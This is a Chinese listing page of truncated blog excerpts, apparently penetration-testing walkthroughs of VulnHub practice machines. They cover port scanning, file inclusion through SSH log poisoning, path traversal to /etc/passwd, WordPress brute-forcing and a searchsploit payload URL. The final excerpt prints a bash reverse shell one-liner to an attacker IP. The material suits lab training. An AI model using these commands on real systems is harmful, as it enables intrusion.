网络安全
vulnhub 标签描述

个人博客地址:http://www.sword-blogs.com/运行环境靶机:网络设为桥接,IP地址为192.168.34.154攻击机:同网段下的kalilinux,IP地址为192.168.34.153开始渗透:将靶机运行起来获取靶机IP地址扫描端口访问80端口源码提示了一个php文件有文件包含访问输入参数并成功包含这里可以看到有两个普通用户和一个root用户包含ssh日志文件成功包含将一句话当作用户名登录ssh密码随便输成功将一句话写到ssh日志文件当中查看当前文件夹下面的内容c2VjcmV0cw/Swordofgryffindor发现了一个密文可能是lestrange用户的密码c2...

  6k0GrpdiCjYb   2023年11月02日   58   0   0 CTF网络安全笔记vulnhub靶机

个人博客地址: http://www.sword-blogs.com/ 下载地址:https://www.vulnhub.com/entry/vulnos-2,147/ 信息搜集 获取IP地址 扫描端口 80端口 点击website跳转到/jabc在jabc/?q=node/7页面看起来啥也没有,但是Ctrl+A全选之后看到提示还有一个目录/jabcd0cs/访问/jabcd0cs/在/jabcd0cs/发现CMS的版本,使用searchsploit查询这里看到了pyload http://[host]/ajax_udf.php?q=1&add_value=odm_us...

  6k0GrpdiCjYb   2023年11月13日   40   0   0 网络安全webvulnhub靶机

靶机介绍 官方下载地址:https://www.vulnhub.com/entry/hackademic-rtb1,17/ 靶机目标 获取root目录里key.txt 运行环境:虚拟机网络设置的是NAT模式 获取靶机IP地址 查看靶机开放端口号 进入靶机 扫描敏感目录 nikto-hhttp://192.168.110.235 dirbhttp://192.168.110.235/Hackademic_RTB1/ gobusterdir-w/usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt-xh...

  omsGpKEBqqZu   2023年11月13日   31   0   0 vulnhub靶机

靶机介绍官方下载地址:http://www.vulnhub.com/entry/acid-server,125/这个靶机的目标是获取root目录的的flag,运行环境靶机:网络连接方式设为NAT,IP地址:192.168.174.134攻击机:同网段下的kaliLinux系统,IP地址为:192.168.174.135开始渗透运行靶机获取靶机IP地址扫描端口及其服务看到只开启了33447端口,是web服务访问33447端口,在源代码中发现了0x643239334c6d70775a773d3d16进制数编码解密之后时base64编码解码之后得到wow.jpg尝试访问,发现无法访问,可能是在其他目...

  6k0GrpdiCjYb   2023年11月02日   55   0   0 php网络安全webvulnhub靶机

个人博客地址: http://www.sword-blogs.com/ 靶机介绍官方下载地址:https://www.vulnhub.com/entry/billu-b0x,188/这个靶机没有flag,进入root目录就算完成,关于本地文件包含的运行环境:靶机:网络连接方式设为桥接,IP地址:192.168.124.25攻击机:通网段下的kalilinux,IP地址:192.168.124.24开始渗透获取IP地址扫描端口扫描目录,使用多个工具一起扫,或者跟换字典扫描开始访问页面80端口首页是一个登录页面,提示我们SQL注入使用万能密码和sqlmap注入都没有注入成功,访问其他页面...

  6k0GrpdiCjYb   2023年11月02日   54   0   0 网络安全web笔记vulnhub靶机

靶机介绍官方下载地址:http://www.vulnhub.com/entry/ck-00,444/难度是容易的,建议使用VirtualBox运行靶机 个人博客地址:http://www.sword-blogs.com/ 运行环境靶机:网络设为桥接,IP地址:192.168.1.90攻击机:同网段下的kalilinux,IP地址:192.168.1.37开始渗透将靶机运行起来靶机运行界面就已经告诉了IP地址,接下来就是扫描端口了这里看到22端口是ssh服务,密钥的加密方式是rsa80端口的架构是wordpress使用wpscan对wordpress扫描,发现有一个用户admin爆破admin用...

  6k0GrpdiCjYb   2023年11月13日   32   0   0 CTF网络安全webvulnhub靶机

1.信息收集-查看kali的ip地址 目标靶机与kali在同一网段,使用nmap对所在网段进行扫描,探测主机 判断192.168.115.212是靶机的ip,使用nmap对靶机进行端口扫描,可以看到开放了22(ssh),80(http)和111(rpcbind)端口。 访问靶机开放的网站 在对页面进行多次点击后,发现一处url如下,有可能存在文件包含 在地址栏将page的值改为../../../../../etc/passwd,页面展示了该文件的内容,说明确实存在文件包含漏洞 利用dirsearch工具扫描网站目录 扫描出来了一个貌似数据库管理页面/dbadmin,访问一下 是一...

  omsGpKEBqqZu   2023年11月13日   29   0   0 pythonvulnhub靶机

个人博客地址:   http://www.sword-blogs.com/运行环境靶机:网络设为桥接,IP地址为192.168.34.154攻击机:同网段下的kalilinux,IP地址为192.168.34.153开始渗透:将靶机运行起来获取靶机IP地址扫描端口访问80端口源码提示了一个php文件有文件包含访问输入参数并成功包含这里可以看到有两个普通用户和一个root用户包含ssh日志文件成功包含将一句话当作用户名登录ssh密码随便输成功将一句话写到ssh日志文件当中查看当前文件夹下面的内容c2VjcmV0cw/Swordofgryffindor发现了一个密文可...

  6k0GrpdiCjYb   2023年11月13日   40   0   0 网络安全webvulnhub靶机

个人博客地址:  http://www.sword-blogs.com/下载地址:https://www.vulnhub.com/entry/bob-101,226/ 信息搜集 扫描IP地址 扫描端口及端口信息 访问80端口并没有发现有用的信息 扫描目录 看到有熟悉的robots.txt,访问看一下发现了dev_shell.php,可以执行一些简单的命令,但是不能执行ls,ifconfig,pwd等命令 getshell bash反弹shell bash-c'execbash-i&>/dev/tcp/192.168.1.140/4444<&1'...

  6k0GrpdiCjYb   2023年11月02日   61   0   0 CTF网络安全webvulnhub靶机